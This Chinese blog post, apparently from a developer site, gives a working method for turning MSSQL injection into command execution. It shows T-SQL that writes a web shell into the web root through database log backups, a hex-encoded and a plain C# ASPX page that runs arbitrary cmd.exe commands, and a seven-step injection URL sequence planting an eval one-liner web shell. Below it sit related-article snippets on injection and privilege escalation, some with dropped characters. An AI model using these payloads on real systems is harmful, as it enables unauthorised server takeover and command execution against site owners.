Mssql 注入攻击,普通权限用户提权操作

AI益加码!Claude Code、Cursor等20+工具免费用! 购周边限时加赠Coding Plan Lite,畅享主流AI工具!学习进阶更高效! 阅读详情

如果该用户能够创建数据库的话

use master
go

create database book
go
use book
go
alter database book set RECOVERY FULL
go
create table cmd (a image)
go
backup database book to disk='c:bookdb.bak' with init
go
backup log book to disk='c:/book.bak' with init
go
insert into cmd (a) values('0x3C25402050616765204C616E67756167653D2243232220436F6E74656E74547970653D22746578742F68746D6C22202076616C6964617465526571756573743D2266616C73652220617370636F6D7061743D227472756522253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E494F2220253E0D0A3C254020696D706F7274206E616D6573706163653D2253797374656D2E446961676E6F73746963732220253E0D0A3C254020496D706F7274204E616D6573706163653D224D6963726F736F66742E57696E33322220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E436F6C6C656374696F6E7322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E657422253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446174612E53716C436C69656E742220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E546872656164696E672220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E65742E536F636B65747322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446961676E6F737469637322253E0D0A3C666F726D2069643D2266726D33222072756E61743D22736572766572223E0D0A20202020202020203C6173703A4C6162656C2049443D224C62446F73222072756E61743D227365727665722220546578743D22444F5320436F6D6D616E643A223E3C2F6173703A4C6162656C3E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F73222072756E61743D22736572766572222057696474683D223439397078223E6E657420757365723C2F6173703A54657874426F783E0D0A20202020202020203C6173703A427574746F6E2049443D22427574746F6E446F73222072756E61743D2273657276657222204F6E436C69636B3D22427574746F6E436D645F436C69636B2220546578743D22434D4422202F3E3C2F62723E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F7343222072756E61743D2273657276657222204865696768743D223330307078222057696474683D2235373070782220426F726465725374796C653D22446F747465642220546578744D6F64653D224D756C74694C696E65223E3C2F6173703A54657874426F783E0D0A20202020202020203C2F666F726D3E0D0A3C7363726970742072756E61743D2273657276657222206C616E6775616E67653D224323223E0D0A20202020202020202020202070726F74656374656420766F696420427574746F6E436D645F436C69636B286F626A6563742073656E6465722C204576656E74417267732065290D0A2020202020202020202020207B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D2022223B0D0A2020202020202020202020202020202050726F63657373206D7970726F63657373203D206E65772050726F6365737328293B0D0A2020202020202020202020202020202050726F636573735374617274496E666F204D7950726F636573735374617274496E666F203D206E65772050726F636573735374617274496E666F2822636D642E65786522293B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E5573655368656C6C45786563757465203D2066616C73653B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E52656469726563745374616E646172644F7574707574203D20747275653B0D0A202020202020202020202020202020206D7970726F636573732E5374617274496E666F203D204D7950726F636573735374617274496E666F3B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E417267756D656E7473203D20222F6322202B2054657874426F78446F732E546578743B0D0A202020202020202020202020202020206D7970726F636573732E537461727428293B0D0A2020202020202020202020202020202053747265616D526561646572206D7973747265616D203D206D7970726F636573732E5374616E646172644F75747075743B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D206D7973747265616D2E52656164546F456E6428293B0D0A202020202020202020202020202020206D7973747265616D2E436C6F736528293B0D0A2020202020202020202020207D0D0A2020202020202020202020203C2F7363726970743E')
go
backup log book to disk='c:/book.aspx' with init
go
use master
go
drop database book
go

上面的方法可以用来生成对应的aspx页面上运行对应的dos命令

如果不能的话,就可以利用上面的方法,使用已有的数据库进行操作,也是可以正常运行dos命令的,但是会出现乱码字符造成代码不能正常运行

 

 

在IE里把DB注入点粘贴上,如http://www.xxxx.com/xxxx.asp?flowNo=1 alter database sq_xxxx set RECOVERY FULL
下面是几个完整的步骤
1.InjectionURL’;alter database sq_huaweitoys set RECOVERY FULL– (把sql设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL’;backup log sq_huaweitoys to disk = ‘c:/cmd’ with init– (减少备分数据的大小)
4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>‘)– (插入一句话木马)
5.InjectionURL’;backup log sq_xxxx to disk = ‘D:/wwwroot/xxxx/wwwroot/hxhack.asp’– (备分日志到WEB路径)
6.InjectionURL’;drop table cmd– (删除新建的cmd表)
7.InjectionURL’;alter database sq_xxxx set RECOVERY SIMPLE–(把sql设置成日志简单恢复模式)

 

 

<%@ Page Language="C#" ContentType="text/html"  validateRequest="false" aspcompat="true"%>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Collections"%>
<%@ Import Namespace="System.Diagnostics"%>
<script runat="server">
protected void ButtonCmd_Click(object sender, EventArgs e)
{
 TextBoxDosC.Text = "";
 Process myprocess = new Process();
 ProcessStartInfo MyProcessStartInfo = new ProcessStartInfo("cmd.exe");
 MyProcessStartInfo.UseShellExecute = false;
 MyProcessStartInfo.RedirectStandardOutput = true;
 myprocess.StartInfo = MyProcessStartInfo;
 MyProcessStartInfo.Arguments = "/c" + TextBoxDos.Text;
 myprocess.Start();
 StreamReader mystream = myprocess.StandardOutput;
 TextBoxDosC.Text = mystream.ReadToEnd();
 mystream.Close();
}
</script>
<form id="frm3" runat="server">
<asp:Label ID="LbDos" runat="server" Text="DOS Command:"></asp:Label>
<asp:TextBox ID="TextBoxDos" runat="server" Width="499px">net user</asp:TextBox>
<asp:Button ID="ButtonDos" runat="server" OnClick="ButtonCmd_Click" Text="CMD" /></br>
<asp:TextBox ID="TextBoxDosC" runat="server" Height="300px" Width="570px" BorderStyle="Dotted" TextMode="MultiLine"></asp:TextBox>
</form>

SQL注入GET参数注入版) 4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。 阅读详情

相关推荐

系统之:Windows

郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 1 利用漏洞1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误2.1 系统服务权限配置错误2.1.1 利用 Po.

f_carey的博客 3313

普通权限运行MySQL操作说明

如果是 system 用户在运行 MySQL ,这个是非常危险的,一旦Mysql 出现漏洞,或被其他模式,直接就是 system 权限。对 MySQL进行降,用普通权限运行假设(1)mysql安装在 d:\mysql 目录(2)运行时用户名为 mysqluser

sql注入拿服务器

sql注入拿服务器

3-4SQL注入系统交互

我们本篇文章将讲述,SQL注入中如何与系统层进行交互的,假如,我们在前面的章节中,可以确认用户,能够与系统层进行交互,那与系统层交互就变得相当重要 1.与系统层交互的方式 因为一旦能够与系统层交互,那就能够 1.读和写磁盘文件 甚至能够以管理员的权限 2.直接执行系统层的命令 这就意味着,系统可能被控制的风险 读和写磁盘文件的方式,因为可能有所限制,但是随着工具的使用,可能最终会得到系统层的权限 第二种,可能与系统层的管理员权限来运行的程序,直接就可以执行命令,这种方式,也相当于得到了系统层的控制 SQL

山兔的博客 2281

WEB 安全之 SQL注入 < 三 >

在文章最后一段管理员做了敏感字符的过滤,管理员过滤掉了空格,而攻击者通过 /**/ 来代替空格绕过了过滤字符。SQL注入是一个比较“古老”的话题,虽然现在存在这种漏洞的站点比较少了,我们还是有必要了解一下它的危害,及其常用的手段,知己知彼方能百战不殆。想一想,注册表都能改了,开启远程桌面,查看远程桌面开放的端口....等等等等,不都是手到擒来的事情吗!打开之后就可以执行了,通过它能做的事情太多了,开启你的想象力,在这里我们看看添加用户 ,需要用到 net user 命令,的大致语法是这样的。

2301_77162959的博客 645

【Web渗透】SQL注入

我们注册一个username为admin[20个空格]asd的用户名,则在mysql中首先会判断是否有重复,若无重复,则会截取前20个字符加入到数据库中,所以数据库存储的数据为admin[20个空格],而进行登录的时候,SQL语句会忽略空格,因此我们相当于覆写了admin账号。为什么要把Linux单独出来说,因为Linux的权限控制很严格,有的时候即使我们完全控住了MYSQL 但是,没有对网站根目录的读写权限,也会没有办法去利用上述方法写shell。

A520013141314的博客 1809

SQL Server 数据库常见总结

前面总结了linux和Windows的方式以及Mysql,这篇文章讲讲SQL Server数据库的

m0_64481831的博客 4944

MSSQL注入手工注入mssql

mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库,数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划

代码审计 2441

内网渗透(二)之

对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有到管理员权限后,才可以运行mimikatz以及执行一些其他高权限操作。对于Linux系统,很多命令需要root权限才能执行,只有到root权限才能执行后面的信息收集等工作。

把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己.... 6938

SQL Server数据库全面解析:手法、工具与案例

SQL Server主要依赖于存储过程(如)与工具(如SQLTools、Metasploit)的结合。在不同账户权限下,策略有所差异:SA账户可直接操作系统,普通用户需借助漏洞或配置错误,低权限用户则需外部突破口。实际案例展示了从权限验证到命令执行的完整流程,希望读者通过本文对SQL Server有全面认识。

盾悟 6117

- MSSQL/Oracle数据库

- MSSQL/Oracle数据库

acepanhuan的博客 647

数据库实战:从SQL注入到系统控制获取的完整攻击链解析

数据库是网络安全渗透测试中的关键技术环节,其本质在于滥用数据库管理系统(DBMS)与操作系统交互的特功能。从技术原理上看,攻击者通过SQL注入等漏洞获取初始数据库访问权限后,会系统性地进行权限评估、功能滥用和命令执行,最终实现从数据库用户操作系统高权限账户的跨越。这一过程涉及对MySQLMSSQL、PostgreSQL等主流数据库内置功能和安全配置的深入理解,例如利用MySQL的FILE权限MSSQL的xp_cmdshell以及PostgreSQL的COPY FROM PROGRAM等特性。在工

weixin_30388677的博客 390

9_数据库

通过本文系统介绍了数据库的核心方法、工具使用及防御策略,认识到权限控制和配置安全在数据库防护中的关键作用,为网络安全实践供了技术参考

专注网络安全技术分享,从漏洞分析到防御策略,记录我的学习与实践。 762

MSSQL渗透攻击链:从SQL注入到Webshell的完整实战剖析

SQL注入是Web安全领域中最常见且危害巨大的漏洞类型之一,它允许攻击者通过构造恶意SQL语句,干扰应用程序与数据库的正常交互逻辑,从而窃取、篡改或破坏数据。其核心原理在于应用程序未对用户输入进行充分验证和过滤,直接将输入拼接到SQL查询中执行。在数据库安全体系中,MSSQL因其在企业内网的广泛部署和与Windows操作系统的深度集成,常成为攻击者实施横向移动和权限升的关键跳板。通过利用xp_cmdshell等扩展存储过程,攻击者可以将数据库权限转化为操作系统命令执行能力,进而实现从数据层到系统层的突破。

weixin_30628077的博客 362

Windows数据库

摘要:本文总结了常见数据库流程和技术,包括MySQLMSSQL、Oracle、PostgreSQL、Redis和Memcached等数据库的方法。涉及获取数据库凭证、利用漏洞执行系统命令等技术手段,如UDF、xp_cmdshell、CVE漏洞利用等。同时介绍了解决数据库外联问题的方法,如建立代理或修改数据库配置开启外联。最后推荐了几款数据库工具,并供了相关服务的启停命令和参考案例链接。文章技术性较强,主要面向安全研究人员进行漏洞复现研究。

starry_ke 440

mssql数据库和Oracle数据库注入

mssql数据库和Oracle数据库注入

cangyu51462的博客 9202

权限升-Windows权限升篇&数据库篇&MYSQL&MSSQL&ORACLE&自动化项目

1、Web到Win-数据库-MSSQL 2、Web到Win-数据库-MYSQL 3、Web到Win-数据库-Oracle 章节点: 1、Web权限升及转移 2、系统权限升及转移 3、宿主权限升及转移 4、域控权限升及转移

SuperherRo的博客 1456

MSSQL数据库注入

MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库中,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否为MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se

zhuangsle的博客 1593

MSSQL注入攻击服务器与防护

文章被发表在黑客防线第5期,是几个人合写的哟 惨的是竟然没有写我的名字,唯一想说的一句是fuck 黑防! WinNT系统下权限设置与黑客的较量 前言:在各种网络上的服务器上,只要黑客能成功入侵不同配置的服务器,都会得到一定的权限,比较GUEST或SYSTEM权限等,但这些权限都是由于服务器管理员的配置不当或缺少管理经验而让黑客成功入侵的,只要我们给服务器上各种危险的组件及命令都加上一定的权限设置,

wsp1的专栏 852
上一篇: 7bit编码
下一篇: IIS 6.0 远程溢出漏洞
hack8
博客等级 码龄18年 109粉丝 128原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值